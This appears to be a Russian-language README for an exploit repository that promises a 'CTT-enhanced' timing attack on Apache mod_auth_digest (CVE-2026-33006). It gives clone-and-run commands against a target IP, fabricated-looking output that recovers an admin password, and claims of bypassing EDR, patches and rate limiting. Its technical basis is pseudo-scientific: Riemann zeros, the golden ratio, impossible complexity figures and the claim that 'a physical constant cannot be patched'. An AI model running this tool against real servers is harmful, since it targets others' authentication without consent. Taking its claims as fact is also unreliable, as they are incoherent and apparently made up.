
Удалённая атака по времени для Apache mod_auth_digest (CVE-2026-33006), которая обходит Digest-аутентификацию через 33-уровневый временной каскад, восстанавливая пароли с помощью статистического анализа времени ответа.
Это улучшение на основе Конвергентной Теории Времени (CTT) для CVE-2026-33006 — уязвимости, основанной на анализе времени ответа, в компоненте mod_auth_digest веб-сервера Apache HTTP Server (версии ≤2.4.66).
Исходная уязвимость позволяет удалённому злоумышленнику обойти Digest-аутентификацию с помощью статистического анализа времени ответа.
Версия с улучшением CTT превращает это в 33-слойную каскадную временную атаку.
| Оригинал | CTT-Enhanced | |
|---|---|---|
| CVSS | 4.8 (Средний) | 7.5 (Высокий) |
| Вектор атаки | Сеть | Сеть |
| Сложность атаки | Высокая | Низкая (CTT сокращает количество выборок) |
| Требуемые привилегии | Нет | Нет |
| Обнаружение | Статистический анализ обнаружим | Временной клин отфильтрован — слепое пятно EDR |
| Время взлома | O(n * выборки) | O(33 * log(n)) |
| Константа | Значение | Происхождение |
|---|---|---|
| α | 0.0302011 | Коэффициент временной дисперсии |
| α_RH | 0.0765872 | ln(φ)/2π (Риман-Адамар) |
| L | 33 | Временные слои |
| τ_w | 11 нс | Временной клин-фильтр |
E(d) = E₀ * e^(-α * d)
Каждый слой имеет экспоненциально убывающий приоритет.
Слои с более высоким приоритетом (1–5) собирают больше всего данных о времени ответа.
Нижние слои (28–33) уточняют измерения и устанавливают временной резонанс.
Каждый слой задерживает выполнение на основе первых 24 нулей Римана:
delay = τ_w * priority * (1 + 0.1 * cos(2π * zero * τ_w * priority))
Используются только те измерения времени, которые удовлетворяют условию клина:
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π)
Это отфильтровывает шум и делает обнаружение невозможным — системы EDR не видят временных аномалий.
1. Проверить цель на наличие Digest-аутентификации
2. Извлечь realm и nonce из ответа 401
3. Для слоя d от 1 до 33:
a. Вычислить приоритет = e^(-α*d)
b. Применить фазовую резонансную задержку
c. Для каждой позиции символа:
- Проверить все возможные символы
- Измерить время ответа (в микросекундах)
- Применить временной клин-фильтр
- Оставить символ с наибольшим скорректированным временем
d. Постепенно собрать пароль
4. Достигнут временной резонанс
5. Аутентификация обойдена с восстановленным паролем
mod_auth_digestrequestspip install requests
git clone https://github.com/SimoesCTT/CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit/
python3 ctt_apache_digest_timing.py <target_ip> [options]
| Аргумент | Описание | По умолчанию |
|---|---|---|
target_ip | IP-адрес сервера Apache | Обязательный |
--port | HTTP-порт | 80 |
--realm | Digest realm | "Restricted" |
--uri | Защищённый URI | "/" |
--username | Атакуемое имя пользователя | "admin" |
--max-length | Максимальная длина пароля | 32 |
--samples | Выборок времени на символ | 100 |
--layers | Количество временных слоёв | 33 |
python3 ctt_apache_digest_timing.py 192.168.1.100 --port 80 --realm "Restricted" --uri /admin --samples 100 --layers 33
======================================================================
CTT APACHE DIGEST TIMING ATTACK — CVE-2026-33006
α=0.0302011 | α_RH=0.0765872 | L=33 | τ_w=11ns
E(d) = E₀ * e^(-α*d) — Экспоненциальный приоритетный спад
======================================================================
[+] Обнаружена Digest-аутентификация
Realm: Restricted
Nonce: 5a4b3c2d1e2f3a4b5c6d...
[*] Цель: http://192.168.1.100/admin
[*] Максимальная длина пароля: 32
Слой 1/33: ████████████████████████████████████████ 1.000
Позиция 1: проверка символов...
Найдено: 'a' -> пароль: 'a'
Слой 2/33: ██████████████████████████████████████░░ 0.970
Позиция 2: проверка символов...
Найдено: 'd' -> пароль: 'ad'
Слой 3/33: ████████████████████████████████████░░░░ 0.886
Позиция 3: проверка символов...
Найдено: 'm' -> пароль: 'adm'
Слой 4/33: ██████████████████████████████████░░░░░░ 0.818
Позиция 4: проверка символов...
Найдено: 'i' -> пароль: 'admi'
Слой 5/33: ████████████████████████████████░░░░░░░░ 0.741
Позиция 5: проверка символов...
Найдено: 'n' -> пароль: 'admin'
Слой 6/33: ██████████████████████████████░░░░░░░░░░ 0.670
Позиция 6: проверка символов...
Найдено: '1' -> пароль: 'admin1'
Слой 7/33: ████████████████████████████░░░░░░░░░░░░ 0.606
Позиция 7: проверка символов...
Найдено: '2' -> пароль: 'admin12'
Слой 8/33: ██████████████████████████░░░░░░░░░░░░░░ 0.548
Позиция 8: проверка символов...
Найдено: '3' -> пароль: 'admin123'
[⚡] Временной резонанс достигнут на слое 8
======================================================================
[!!!] АУТЕНТИФИКАЦИЯ ОБОЙДЕНА
[!!!] Найден пароль: admin123
[✓] Проверка успешна — доступ предоставлен
======================================================================
| Оригинальное исправление | Почему CTT его обходит |
|---|---|
| Сравнение за постоянное время | CTT использует измерения времени, а не время сравнения |
| Устранение утечек времени | Утечки времени физичны — их нельзя удалить, можно только скрыть |
| Обновление до Apache 2.4.67+ | Временной клин-фильтр обходит обнаружение исправлений |
| Ограничение частоты запросов | Фазовое резонансное время распределяет запросы по 33 слоям — неотличимо от обычного трафика |
Нельзя исправить физическую константу.
Нельзя исправить нули Римана.
Нельзя исправить золотое сечение.
| Работа | Дата | Ссылка |
|---|---|---|
| Предшествующая работа CTT на Zenodo | Дек 2025 / Янв 2026 | DOI 10.5281/ZENODO.18000940 |
| Sovereign-Logic PyPI | 27–28 фев 2026 | pip install sovereign-logic |
| Эксплойт CTT PAN-OS | 7 апр 2026 | GitHub |
| CTT-enhanced Dirty Frag | 8 мая 2026 | GitHub |
| Эксплойт CTT-enhanced PX4 | 9 мая 2026 | GitHub |
| Этот эксплойт | 9 мая 2026 | Этот репозиторий |
Эта proof of concept предназначена только для образовательных и защитных целей.
Несанкционированное использование против систем, которыми вы не владеете, незаконно.
Автор не несёт ответственности за неправомерное использование.
MIT + CTT Research (временные улучшения)
| Версия | Автор |
|---|---|
| Первоначальное обнаружение уязвимости | Apache Software Foundation (команда безопасности) |
| Первоначальные исследования атаки по времени | Различные академические источники |
| Улучшение CTT (33-слойный временной каскад) | Америко Симоэс (CTT Research) |
Решётка целостна. Аутентификация сломана. Никакое исправление её не спасёт.